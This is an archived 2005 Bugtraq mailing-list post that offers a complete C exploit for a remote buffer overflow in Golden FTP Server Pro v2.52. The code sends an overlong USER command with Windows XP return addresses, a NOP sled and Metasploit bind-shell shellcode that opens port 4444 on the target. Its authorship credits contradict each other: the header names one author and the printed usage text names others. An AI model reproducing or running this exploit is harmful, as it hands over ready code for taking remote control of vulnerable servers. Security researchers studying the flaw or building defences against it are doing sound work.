[<prev] [next>] [day] [month] [year] [list]
Message-ID: <BAY9-F29ACDEB9A51AFEE0C87E25C2250@phx.gbl>
Date: Sat, 30 Apr 2005 15:03:17 +0000
From: "mohamed amhemed" <rodhedor@...mail.com>
To: bugtraq@...urityfocus.com
Subject: Golden FTP Server Pro Remote Buffer Overflow Exploit
Golden FTP Server Pro Remote Buffer Overflow Exploit
Bug Discovered by rod hedor (http://lezr.com)
Exploit coded By lezr hack
Web: lezr.com
E-Mail: rodhedor@...mail.com
Usage:exploit <targetOs> <targetIp>
/
/
Vulnerable Versions:
Golden FTP Server Pro v2.52
Exploit:
Run the exploit against the server. Afterward, right
click on the Golden FTP Server Pro icon in the Windows tray and click
Statistic.
It will open bind shell on port 4444
/
#include <windows.h>
#include <stdio.h>
#pragma comment(lib, "ws2_32.lib")
char userreq[] =
"USER "
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
char *target[]= //return addr
{
"\xFC\x18\xD7\x77", //WinXp Sp1 Eng - jmp esp addr
"\xBF\xAC\xDA\x77" //WinXp Sp2 Eng - jmp esp addr
};
char shellcode[] =
/* win32_bind - EXITFUNC=seh LPORT=4444 Size=348 Encoder=PexFnstenvSub
http://metasploit.com */
"\x31\xc9\x83\xe9\xaf\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x82"
"\x2a\x64\x94\x83\xeb\xfc\xe2\xf4\x7e\x40\x8f\xdb\x6a\xd3\x9b\x6b"
"\x7d\x4a\xef\xf8\xa6\x0e\xef\xd1\xbe\xa1\x18\x91\xfa\x2b\x8b\x1f"
"\xcd\x32\xef\xcb\xa2\x2b\x8f\x77\xb2\x63\xef\xa0\x09\x2b\x8a\xa5"
"\x42\xb3\xc8\x10\x42\x5e\x63\x55\x48\x27\x65\x56\x69\xde\x5f\xc0"
"\xa6\x02\x11\x77\x09\x75\x40\x95\x69\x4c\xef\x98\xc9\xa1\x3b\x88"
"\x83\xc1\x67\xb8\x09\xa3\x08\xb0\x9e\x4b\xa7\xa5\x42\x4e\xef\xd4"
"\xb2\xa1\x24\x98\x09\x5a\x78\x39\x09\x6a\x6c\xca\xea\xa4\x2a\x9a"
"\x6e\x7a\x9b\x42\xb3\xf1\x02\xc7\xe4\x42\x57\xa6\xea\x5d\x17\xa6"
"\xdd\x7e\x9b\x44\xea\xe1\x89\x68\xb9\x7a\x9b\x42\xdd\xa3\x81\xf2"
"\x03\xc7\x6c\x96\xd7\x40\x66\x6b\x52\x42\xbd\x9d\x77\x87\x33\x6b"
"\x54\x79\x37\xc7\xd1\x79\x27\xc7\xc1\x79\x9b\x44\xe4\x42\x75\xc8"
"\xe4\x79\xed\x75\x17\x42\xc0\x8e\xf2\xed\x33\x6b\x54\x40\x74\xc5"
"\xd7\xd5\xb4\xfc\x26\x87\x4a\x7d\xd5\xd5\xb2\xc7\xd7\xd5\xb4\xfc"
"\x67\x63\xe2\xdd\xd5\xd5\xb2\xc4\xd6\x7e\x31\x6b\x52\xb9\x0c\x73"
"\xfb\xec\x1d\xc3\x7d\xfc\x31\x6b\x52\x4c\x0e\xf0\xe4\x42\x07\xf9"
"\x0b\xcf\x0e\xc4\xdb\x03\xa8\x1d\x65\x40\x20\x1d\x60\x1b\xa4\x67"
"\x28\xd4\x26\xb9\x7c\x68\x48\x07\x0f\x50\x5c\x3f\x29\x81\x0c\xe6"
"\x7c\x99\x72\x6b\xf7\x6e\x9b\x42\xd9\x7d\x36\xc5\xd3\x7b\x0e\x95"
"\xd3\x7b\x31\xc5\x7d\xfa\x0c\x39\x5b\x2f\xaa\xc7\x7d\xfc\x0e\x6b"
"\x7d\x1d\x9b\x44\x09\x7d\x98\x17\x46\x4e\x9b\x42\xd0\xd5\xb4\xfc"
"\x72\xa0\x60\xcb\xd1\xd5\xb2\x6b\x52\x2a\x64\x94";
char nops[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90";
char passreq[] =
"PASS \r\n";
void main(int argc, char *argv[])
{
WSADATA wsaData;
WORD wVersionRequested;
struct hostent *pTarget;
struct sockaddr_in sock;
SOCKET mysocket;
char rec[1024];
if (argc < 3)
{
printf("\r\nGolden FTP Server Pro Remote Buffer Overflow
Exploit\r\n",argv[0]);
printf("Bug Discovered by Reed Arvin
(http://reedarvin.thearvins.com)\r\n");
printf("Exploit coded By ATmaCA\r\n");
printf("Web: atmacasoft.com && spyinstructors.com\r\n");
printf("Credit to kozan and metasploit\r\n");
printf("Usage:\r\nexploit <targetOs>
<targetIp>\r\n\r\n",argv[0]);
printf("Targets:\n");
printf("1 - WinXP SP1 english\n");
printf("2 - WinXP SP2 english\n");
printf("Example:exploit 2 127.0.0.1\n");
return;
}
int targetnum = atoi(argv[1]) - 1;
char *evilbuf =
(char*)malloc(sizeof(userreq)+sizeof(shellcode)+sizeof(nops)
+sizeof(passreq)+7);
strcpy(evilbuf,userreq);
strcat(evilbuf,target[targetnum]);
strcat(evilbuf,nops);
strcat(evilbuf,shellcode);
strcat(evilbuf,"\r\n");
strcat(evilbuf,passreq);
//printf("%s",evilbuf);
wVersionRequested = MAKEWORD(1, 1);
if (WSAStartup(wVersionRequested, &wsaData) < 0) return;
mysocket = socket(AF_INET, SOCK_STREAM, 0);
if(mysocket==INVALID_SOCKET){
printf("Socket error!\r\n");
exit(1);
}
printf("Resolving Hostnames...\n");
if ((pTarget = gethostbyname(argv[2])) == NULL){
printf("Resolve of %s failed\n", argv[1]);
exit(1);
}
memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
sock.sin_family = AF_INET;
sock.sin_port = htons(21);
printf("Connecting...\n");
if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) ))){
printf("Couldn't connect to host.\n");
exit(1);
}
printf("Connected!...\n");
printf("Waiting for welcome message...\n");
Sleep(10);
recv(mysocket,rec,1024,0);
printf("Sending evil request...\n");
if (send(mysocket,evilbuf, strlen(evilbuf)+1, 0) == -1){
printf("Error Sending evil request.\r\n");
closesocket(mysocket);
exit(1);
}
Sleep(10);
printf("Success.\n");
closesocket(mysocket);
WSACleanup();
}
// راندفو انت ح ث ا؛؛؛ ل ة
_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE!
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/
Powered by blists - more mailing lists